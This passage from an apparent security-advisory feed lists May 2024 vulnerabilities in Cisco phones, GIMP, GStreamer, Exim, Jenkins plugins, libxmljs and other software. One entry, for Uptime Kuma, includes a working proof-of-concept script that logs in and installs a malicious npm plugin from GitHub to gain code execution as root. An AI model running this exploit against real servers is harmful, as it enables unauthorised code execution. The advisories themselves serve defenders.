Guide](https://docs.oracle.com/en/java/javase/22/security/java-api-xml-processing-jaxp-security-guide.html#GUID-E345AA09-801E-4B95-B83D-7F0C452538AA)https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-CHFM-68VV-PVW5
01.05.2024 19:00:00cisco[CISCO-SA-IPPHONE-MULTI-VULNS-CXAHCVS] Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware Vulnerabilities (high)Multiple vulnerabilities in Cisco IP Phone firmware could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition, gain unauthorized access, or view sensitive information on an affected system.For more information about these vulnerabilities, see the Details ["#details"] section of this advisory.Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-IPPHONE-MULTI-VULNS-CXAHCVS
01.05.2024 13:01:26npm[NPM:GHSA-7GRX-F945-MJ96] Uptime Kuma vulnerable to authenticated remote code execution via malicious plugin installation (high)### Summary Installation of a maliciously crafted plugin allows for remote code execution by an authenticated attacker. ### Details Uptime Kuma allows authenticated users to install plugins from an official list of plugins. This feature is currently disabled in the web interface, but the corresponding API endpoints are still available after login. After downloading a plugin, it's installed by calling `npm install` in the installation directory of the plugin: https://github.com/louislam/uptime-kuma/blob/8c60e902e1c76ecbbd1b0423b07ce615341cb850/server/plugins-manager.js#L210-L216 Because the plugin is not validated against the official list of plugins or installed with `npm install --ignore-scripts`, a maliciously crafted plugin taking advantage of [npm scripts](https://docs.npmjs.com/cli/v9/using-npm/scripts) can gain remote code execution. ### PoC In the PoC below, the plugin at https://github.com/n-thumann/npm-install-script-poc will be installed. It only consists of an empty `index.js` and a `package.json` containing the script: `"preinstall": "echo \"Malicious code could have been executed as user $(whoami)\" > /tmp/poc"`. This will be executed when installing the plugin. 1. Start Uptime Kuma: `docker run -d -p 3001:3001 -v uptime-kuma:/app/data --name uptime-kuma louislam/uptime-kuma:1` 2. Create a user using the Uptime Kuma web interface, e.g. user `admin` with password `admin123` 3. Confirm that the PoC file to be created doesn't exist yet: ```➜ ~ docker exec -it uptime-kuma cat /tmp/poc cat: /tmp/poc: No such file or directory``` 4. Create file `poc.js` with the following content: ```SERVER = "ws://localhost:3001";USERNAME = "admin";PASSWORD = "admin123";const { io } = require("socket.io-client");const socket = io(SERVER);const repo = "https://github.com/n-thumann/npm-install-script-poc";const name = "npm-install-script-poc";socket.emit( "login", { username: USERNAME, password: PASSWORD, token: "" }, (res) => { if (res.ok !== true) return console.log("Login failed"); console.log("Login successful"); socket.emit("installPlugin", repo, name, () => { console.log("Done"); socket.close(); }); });``` 5. Install `socket.io-client`: `npm install socket.io-client` 6. Run the script: `node poc.js`: ```# node poc.js Login successful Done``` 7. The PoC file has been created: ```➜ ~ docker exec -it uptime-kuma cat /tmp/poc Malicious code could have been executed as user root``` ### Impact This vulnerability allows an authenticated attacker to gain remote code execution on the server Uptime Kuma is running on.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-7GRX-F945-MJ96
01.05.2024 13:01:03npm[NPM:GHSA-VR8X-74PM-6VJ7] Uptime Kuma's authenticated path traversal via plugin repository name may lead to unavailability or data loss (moderate)### SummaryA path traversal vulnerability via the plugin repository name allows an authenticated attacker to delete files on the server leading to unavailability and potentially data loss.### DetailsUptime Kuma allows authenticated users to install plugins from an official list of plugins. This feature is currently disabled in the web interface, but the corresponding API endpoints are still available after login.Before a plugin is downloaded, the plugin installation directory is checked for existence. If it exists, it's removed before the plugin installation.Because the plugin is not validated against the official list of plugins or sanitized, the check for existence and the removal of the plugin installation directory are prone to path traversal.### ImpactThis vulnerability allows an authenticated attacker to delete files from the server Uptime Kuma is running on.Depending on which files are deleted, Uptime Kuma or the whole system may become unavailable due to data loss.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-VR8X-74PM-6VJ7
01.05.2024 03:00:00cisa[CISA-2024:0501] CISA Adds One Known Exploited Vulnerability to Catalog (high)CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0501
01.05.2024 11:25:04npm[NPM:GHSA-GHR5-CH3P-VCR6] ejs lacks certain pollution protection (moderate)The ejs (aka Embedded JavaScript templates) package before 3.1.10 for Node.js lacks certain pollution protection.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-GHR5-CH3P-VCR6
05.05.2024 03:00:00gentoo[GLSA-202405-10] Setuptools: Denial of Service (normal)A vulnerability has been discovered in Setuptools, which can lead to denial of service.https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-10
05.05.2024 03:00:00gentoo[GLSA-202405-12] Pillow: Multiple Vulnerabilities (high)Multiple vulnerabilities have been discovered in Pillow, the worst of which can lead to arbitrary code execution.https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-12
05.05.2024 03:00:00gentoo[GLSA-202405-11] MIT krb5: Multiple Vulnerabilities (normal)Multiple vulnerabilities have been discovered in MIT krb5, the worst of which could lead to remote code execution.https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-11
05.05.2024 03:00:00gentoo[GLSA-202405-13] borgmatic: Shell Injection (high)A vulnerability has been discovered in borgmatic, which can lead to shell injection.https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-13
05.05.2024 03:00:00gentoo[GLSA-202405-14] QtWebEngine: Multiple Vulnerabilities (high)Multiple vulnerabilities have been discovered in QtWebEngine, the worst of which could lead to remote code execution.https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-14
05.05.2024 03:00:00gentoo[GLSA-202405-15] Mozilla Firefox: Multiple Vulnerabilities (high)Multiple vulnerabilities have been discovered in Mozilla Firefox, the worst of which can lead to remote code execution.https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-15
05.05.2024 03:00:00gentoo[GLSA-202405-16] Apache Commons BCEL: Remote Code Execution (normal)A vulnerability has been discovered in Apache Commons BCEL, which can lead to remote code execution.https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-16
04.05.2024 03:00:00gentoo[GLSA-202405-04] systemd: Multiple Vulnerabilities (normal)Multiple vulnerabilities have been discovered in systemd, the worst of which can lead to a denial of service.https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-04
04.05.2024 03:00:00gentoo[GLSA-202405-05] MPlayer: Multiple Vulnerabilities (normal)Multiple vulnerabilities have been discovered in MPlayer, the worst of which can lead to arbitrary code execution.https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-05
04.05.2024 03:00:00gentoo[GLSA-202405-06] mujs: Multiple Vulnerabilities (normal)Multiple vulnerabilities have been discovered in mujs, the worst of which could lead to remote code execution.https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-06
04.05.2024 03:00:00gentoo[GLSA-202405-07] HTMLDOC: Multiple Vulnerabilities (normal)Multiple vulnerabilities have been discovered in HTMLDOC, the worst of which can lead to arbitrary code execution.https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-07
04.05.2024 03:00:00gentoo[GLSA-202405-08] strongSwan: Multiple Vulnerabilities (normal)Multiple vulnerabilities have been discovered in strongSwan, the worst of which could possibly lead to remote code execution.https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-08
04.05.2024 03:00:00gentoo[GLSA-202405-01] Python, PyPy3: Multiple Vulnerabilities (high)Multiple vulnerabilities have been discovered in Python and PyPy3, the worst of which can lead to privilege escalation.https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-01
04.05.2024 03:00:00gentoo[GLSA-202405-02] ImageMagick: Multiple Vulnerabilities (high)Multiple vulnerabilities have been discovered in ImageMagick, the worst of which can lead to remote code execution.https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-02
04.05.2024 03:00:00gentoo[GLSA-202405-03] Dalli: Code Injection (normal)A vulnerability has been discovered in Dalli, which can lead to code injection.https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-03
04.05.2024 03:00:00gentoo[GLSA-202405-09] MediaInfo, MediaInfoLib: Multiple Vulnerabilities (normal)Multiple vulnerabilities have been found in MediaInfo and MediaInfoLib, the worst of which could allow user-assisted remote code execution.https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-09
03.05.2024 23:30:39npm[NPM:GHSA-HFRV-H3Q8-9JPR] kurwov vulnerable to Denial of Service due to improper data sanitization (moderate)### SummaryAn unsafe sanitization of dataset contents on the `MarkovData#getNext` method used in `Markov#generate` and `Markov#choose` allows a maliciously crafted string on the dataset to throw and stop the function from running properly.### Detailshttps://github.com/xiboon/kurwov/blob/0d58dfa42135ab40e830e92622857282f980ca89/src/MarkovData.ts#L38-L44If a string contains a forbidden substring (i.e. `__proto__`) followed by a space character, the second line will access a special property in `MarkovData#finalData` by removing the last character of the string, bypassing the dataset sanitization (as it is supposed to be already sanitized before this function is called).`data` is then defined as the special function found in its prototype instead of an array.On the last line, `data` is then indexed by a random number, which is supposed to return a string but returns undefined as it's a function. Calling `endsWith` then throws.### PoChttps://runkit.com/embed/m6uu40r5ja9b### ImpactAny dataset can be contaminated with the substring making it unable to properly generate anything in some cases.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-HFRV-H3Q8-9JPR
03.05.2024 23:34:33maven[MAVEN:GHSA-4H8F-2WVX-GG5W] Bouncy Castle Java Cryptography API vulnerable to DNS poisoning (low)An issue was discovered in Bouncy Castle Java Cryptography APIs before BC 1.78. When endpoint identification is enabled in the BCJSSE and an SSL socket is created without an explicit hostname (as happens with HttpsURLConnection), hostname verification could be performed against a DNS-resolved IP address in some situations, opening up a possibility of DNS poisoning.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-4H8F-2WVX-GG5W
03.05.2024 23:38:16npm[NPM:GHSA-M5JF-8CRM-R65M] Vditor allows Cross-site Scripting via an attribute of an `A` element (moderate)Vditor 3.10.3 allows XSS via an attribute of an `A` element.NOTE: the vendor indicates that a user is supposed to mitigate this via `sanitize=true`.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-M5JF-8CRM-R65M
03.05.2024 13:15:08alpinelinux[ALPINE:CVE-2024-34062] py3-tqdm vulnerability (medium)[From CVE-2024-34062] tqdm is an open source progress bar for Python and CLI. Any optional non-boolean CLI arguments (e.g. `--delim`, `--buf-size`, `--manpath`) are passed through python's `eval`, allowing arbitrary code execution. This issue is only locally exploitable and had been addressed in release version 4.66.3. All users are advised to upgrade. There are no known workarounds for this vulnerability.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-34062
03.05.2024 10:54:25suse[SUSE-SU-2024:1490-1] Security update for the Linux Kernel (important)Security update for the Linux Kernelhttps://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1490-1
03.05.2024 06:16:00alpinelinux[ALPINE:CVE-2023-44444] gimp vulnerability (high)[From CVE-2023-44444] GIMP PSP File Parsing Off-By-One Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of PSP files. Crafted data in a PSP file can trigger an off-by-one error when calculating a location to write within a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-22097.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-44444
03.05.2024 06:16:00alpinelinux[ALPINE:CVE-2023-44443] gimp vulnerability (high)[From CVE-2023-44443] GIMP PSP File Parsing Integer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of PSP files. The issue results from the lack of proper validation of user-supplied data, which can result in an integer overflow before writing to memory. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-22096.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-44443
03.05.2024 06:16:00alpinelinux[ALPINE:CVE-2023-44446] gst-plugins-bad vulnerability (high)[From CVE-2023-44446] GStreamer MXF File Parsing Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GStreamer. Interaction with this library is required to exploit this vulnerability but attack vectors may vary depending on the implementation.The specific flaw exists within the parsing of MXF video files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-22299.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-44446
03.05.2024 06:15:59alpinelinux[ALPINE:CVE-2023-44441] gimp vulnerability (high)[From CVE-2023-44441] GIMP DDS File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of DDS files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-22093.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-44441
03.05.2024 06:15:59alpinelinux[ALPINE:CVE-2023-44442] gimp vulnerability (high)[From CVE-2023-44442] GIMP PSD File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of PSD files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute arbitrary code in the context of the current process. Was ZDI-CAN-22094.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-44442
03.05.2024 06:15:57alpinelinux[ALPINE:CVE-2023-44429] gst-plugins-bad vulnerability (high)[From CVE-2023-44429] GStreamer AV1 Codec Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GStreamer. Interaction with this library is required to exploit this vulnerability but attack vectors may vary depending on the implementation.The specific flaw exists within the parsing of AV1 encoded video files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-22226.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-44429
03.05.2024 06:15:50alpinelinux[ALPINE:CVE-2023-42115] exim vulnerability (critical)[From CVE-2023-42115] Exim AUTH Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Exim. Authentication is not required to exploit this vulnerability. The specific flaw exists within the smtp service, which listens on TCP port 25 by default. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of a buffer. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-17434.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-42115
03.05.2024 06:15:50alpinelinux[ALPINE:CVE-2023-42116] exim vulnerability (high)[From CVE-2023-42116] Exim SMTP Challenge Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Exim. Authentication is not required to exploit this vulnerability.The specific flaw exists within the handling of NTLM challenge requests. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-17515.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-42116
03.05.2024 06:15:50alpinelinux[ALPINE:CVE-2023-42117] exim vulnerability (high)[From CVE-2023-42117] Exim Improper Neutralization of Special Elements Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Exim. Authentication is not required to exploit this vulnerability.The specific flaw exists within the smtp service, which listens on TCP port 25 by default. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-17554.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-42117
03.05.2024 06:15:50alpinelinux[ALPINE:CVE-2023-42118] libspf2 vulnerability (high)[From CVE-2023-42118] Exim libspf2 Integer Underflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Exim libspf2. Authentication is not required to exploit this vulnerability. The specific flaw exists within the parsing of SPF macros. When parsing SPF macros, the process does not properly validate user-supplied data, which can result in an integer underflow before writing to memory. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-17578.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-42118
03.05.2024 06:15:50alpinelinux[ALPINE:CVE-2023-42119] exim vulnerability (low)[From CVE-2023-42119] Exim dnsdb Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of Exim. Authentication is not required to exploit this vulnerability.The specific flaw exists within the smtp service, which listens on TCP port 25 by default. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the service account. Was ZDI-CAN-17643.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-42119
03.05.2024 06:15:49alpinelinux[ALPINE:CVE-2023-42114] exim vulnerability (low)[From CVE-2023-42114] Exim NTLM Challenge Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Exim. Authentication is not required to exploit this vulnerability.The specific flaw exists within the handling of NTLM challenge requests. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated data structure. An attacker can leverage this vulnerability to disclose information in the context of the service account. Was ZDI-CAN-17433.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-42114
03.05.2024 06:15:20alpinelinux[ALPINE:CVE-2023-40475] gst-plugins-bad vulnerability (high)[From CVE-2023-40475] GStreamer MXF File Parsing Integer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GStreamer. Interaction with this library is required to exploit this vulnerability but attack vectors may vary depending on the implementation.The specific flaw exists within the parsing of MXF video files. The issue results from the lack of proper validation of user-supplied data, which can result in an integer overflow before allocating a buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-21661.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-40475
03.05.2024 06:15:20alpinelinux[ALPINE:CVE-2023-40476] gst-plugins-bad vulnerability (high)[From CVE-2023-40476] GStreamer H265 Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GStreamer. Interaction with this library is required to exploit this vulnerability but attack vectors may vary depending on the implementation.The specific flaw exists within the parsing of H265 encoded video files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-21768.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-40476
03.05.2024 06:15:19alpinelinux[ALPINE:CVE-2023-40474] gst-plugins-bad vulnerability (high)[From CVE-2023-40474] GStreamer MXF File Parsing Integer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GStreamer. Interaction with this library is required to exploit this vulnerability but attack vectors may vary depending on the implementation.The specific flaw exists within the parsing of MXF video files. The issue results from the lack of proper validation of user-supplied data, which can result in an integer overflow before allocating a buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-21660.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-40474
03.05.2024 05:15:53alpinelinux[ALPINE:CVE-2023-38103] gst-plugins-ugly vulnerability (high)[From CVE-2023-38103] GStreamer RealMedia File Parsing Integer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GStreamer. Interaction with this library is required to exploit this vulnerability but attack vectors may vary depending on the implementation. The specific flaw exists within the parsing of MDPR chunks. The issue results from the lack of proper validation of user-supplied data, which can result in an integer overflow before allocating a buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-21443.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-38103
03.05.2024 05:15:53alpinelinux[ALPINE:CVE-2023-38104] gst-plugins-ugly vulnerability (high)[From CVE-2023-38104] GStreamer RealMedia File Parsing Integer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GStreamer. Interaction with this library is required to exploit this vulnerability but attack vectors may vary depending on the implementation. The specific flaw exists within the parsing of MDPR chunks. The issue results from the lack of proper validation of user-supplied data, which can result in an integer overflow before allocating a buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-21444.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-38104
03.05.2024 05:15:43alpinelinux[ALPINE:CVE-2023-37327] gst-plugins-good vulnerability (high)[From CVE-2023-37327] GStreamer FLAC File Parsing Integer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GStreamer. Interaction with this library is required to exploit this vulnerability but attack vectors may vary depending on the implementation. The specific flaw exists within the parsing of FLAC audio files. The issue results from the lack of proper validation of user-supplied data, which can result in an integer overflow before allocating a buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-20775.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-37327
03.05.2024 05:15:43alpinelinux[ALPINE:CVE-2023-37328] gst-plugins-bad vulnerability (high)[From CVE-2023-37328] GStreamer PGS File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GStreamer. Interaction with this library is required to exploit this vulnerability but attack vectors may vary depending on the implementation. The specific flaw exists within the parsing of PGS subtitle files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-20994.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-37328
03.05.2024 05:15:43alpinelinux[ALPINE:CVE-2023-37329] gst-plugins-bad vulnerability (high)[From CVE-2023-37329] GStreamer SRT File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GStreamer. Interaction with this library is required to exploit this vulnerability but attack vectors may vary depending on the implementation. The specific flaw exists within the parsing of SRT subtitle files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-20968.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-37329
03.05.2024 03:00:00debian[DSA-5678-1] glibcsecurity updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5678-1
03.05.2024 03:00:00debian[DSA-5679-1] lesssecurity updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5679-1
03.05.2024 03:00:00debian[DSA-5677-1] ruby3.1security updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5677-1
03.05.2024 23:24:30npm[NPM:GHSA-6433-X5P4-8JC7] libxmljs vulnerable to type confusion when parsing specially crafted XML (high)libxmljs is vulnerable to a type confusion vulnerability when parsing a specially crafted XML while invoking a function on the result of `attrs()` that was called on a parsed node. This vulnerability might lead to denial of service (on both 32-bit systems and 64-bit systems), data leak, infinite loop and remote code execution (on 32-bit systems with the XML_PARSE_HUGE flag enabled).https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-6433-X5P4-8JC7
03.05.2024 23:24:18npm[NPM:GHSA-78H3-PG4X-J8CV] libxmljs vulnerable to type confusion when parsing specially crafted XML (high)libxmljs2 is vulnerable to a type confusion vulnerability when parsing a specially crafted XML while invoking the `namespaces()` function (which invokes `XmlNode::get_local_namespaces()`) on a grand-child of a node that refers to an entity. This vulnerability can lead to denial of service and remote code execution.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-78H3-PG4X-J8CV
03.05.2024 23:24:05npm[NPM:GHSA-MG49-JQGW-GCJ6] libxmljs vulnerable to type confusion when parsing specially crafted XML (high)libxmljs is vulnerable to a type confusion vulnerability when parsing a specially crafted XML while invoking the `namespaces()` function (which invokes `_wrap__xmlNode_nsDef_get()`) on a grand-child of a node that refers to an entity. This vulnerability can lead to denial of service and remote code execution.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-MG49-JQGW-GCJ6
03.05.2024 20:33:01npm[NPM:GHSA-MJR4-7XG5-PFVH] libxmljs2 type confusion vulnerability when parsing specially crafted XML (high)libxmljs2 is vulnerable to type confusion when parsing a specially crafted XML while invoking a function on the result of attrs() that was called on a parsed node. This vulnerability might lead to denial of service (on both 32-bit systems and 64-bit systems), data leak, infinite loop and remote code execution (on 32-bit systems with the XML_PARSE_HUGE flag enabled). At the time of publication, there is no fix.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-MJR4-7XG5-PFVH
02.05.2024 23:15:07alpinelinux[ALPINE:CVE-2024-4140] perl-email-mime vulnerability (high)[From CVE-2024-4140] An excessive memory use issue (CWE-770) exists in Email-MIME, before version 1.954, which can cause denial of service when parsing multipart MIME messages. The patch set (from 2020 and 2024) limits excessive depth and the total number of parts.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-4140
02.05.2024 18:57:55ubuntu[USN-6757-2] PHP vulnerabilities (medium)Several security issues were fixed in PHP.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6757-2
03.05.2024 23:12:01maven[MAVEN:GHSA-X7G6-RWHC-G7MJ] Wildfly vulnerable to denial of service (moderate)A vulnerability was found in Wildfly’s management interface. Due to the lack of limitation of sockets for the management interface, it may be possible to cause a denial of service hitting the nofile limit as there is no possibility to configure or set a maximum number of connections.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-X7G6-RWHC-G7MJ
03.05.2024 22:37:36maven[MAVEN:GHSA-PHH3-2P9M-W6J5] Jenkins Subversion Partial Release Manager Plugin programmatically disables the fix for CVE-2016-3721 (moderate)Jenkins Subversion Partial Release Manager Plugin 1.0.1 and earlier programmatically sets the Java system property `hudson.model.ParametersAction.keepUndefinedParameters` whenever a build is triggered from a release tag with the 'Svn-Partial Release Manager' SCM. Doing so disables the fix for [SECURITY-170](https://www.jenkins.io/security/advisory/2016-05-11/#arbitrary-build-parameters-are-passed-to-build-scripts-as-environment-variables) / CVE-2016-3721. As of publication of this advisory, there is no fix.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-PHH3-2P9M-W6J5
03.05.2024 22:35:09maven[MAVEN:GHSA-94PR-W968-H923] Jenkins Telegram Bot Plugin stores the Telegram Bot token in plaintext (low)Jenkins Telegram Bot Plugin 1.4.0 and earlier stores the Telegram Bot token unencrypted in its global configuration file `jenkinsci.plugins.telegrambot.TelegramBotGlobalConfiguration.xml` on the Jenkins controller as part of its configuration. This token can be viewed by users with access to the Jenkins controller file system. As of publication of this advisory, there is no fix.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-94PR-W968-H923
03.05.2024 23:17:37maven[MAVEN:GHSA-2G4Q-9VM9-9FW4] Jenkins Script Security Plugin sandbox bypass vulnerability (moderate)Jenkins Script Security Plugin provides a sandbox feature that allows low privileged users to define scripts, including Pipelines, that are generally safe to execute. Calls to code defined inside a sandboxed script are intercepted, and various allowlists are checked to determine whether the call is to be allowed. Multiple sandbox bypass vulnerabilities exist in Script Security Plugin 1335.vf07d9ce377a_e and earlier:
- Crafted constructor bodies that invoke other constructors can be used to construct any subclassable type via implicit casts.
- Sandbox-defined Groovy classes that shadow specific non-sandbox-defined classes can be used to construct any subclassable type.
These vulnerabilities allow attackers with permission to define and run sandboxed scripts, including Pipelines, to bypass the sandbox protection and execute arbitrary code in the context of the Jenkins controller JVM.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-2G4Q-9VM9-9FW4
03.05.2024 23:14:30maven[MAVEN:GHSA-V63G-V339-2673] Jenkins Script Security Plugin has sandbox bypass vulnerability involving crafted constructor bodies (high)Jenkins Script Security Plugin provides a sandbox feature that allows low privileged users to define scripts, including Pipelines, that are generally safe to execute. Calls to code defined inside a sandboxed script are intercepted, and various allowlists are checked to determine whether the call is to be allowed. Multiple sandbox bypass vulnerabilities exist in Script Security Plugin 1335.vf07d9ce377a_e and earlier:
- Crafted constructor bodies that invoke other constructors can be used to construct any subclassable type via implicit casts.
- Sandbox-defined Groovy classes that shadow specific non-sandbox-defined classes can be used to construct any subclassable type.
These vulnerabilities allow attackers with permission to define and run sandboxed scripts, including Pipelines, to bypass the sandbox protection and execute arbitrary code in the context of the Jenkins controller JVM.
- These issues are caused by an incomplete fix of [SECURITY-2824](https://www.jenkins.io/security/advisory/2022-10-19/#SECURITY-2824%20(1)).
Script Security Plugin 1336.vf33a_a_9863911 has additional restrictions and sanity checks to ensure that super constructors cannot be constructed without being intercepted by the sandbox:
- Calls to other constructors using this are now intercepted by the sandbox.
- Classes in packages that can be shadowed by Groovy-defined classes are no longer ignored by the sandbox when intercepting super constructor calls.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-V63G-V339-2673
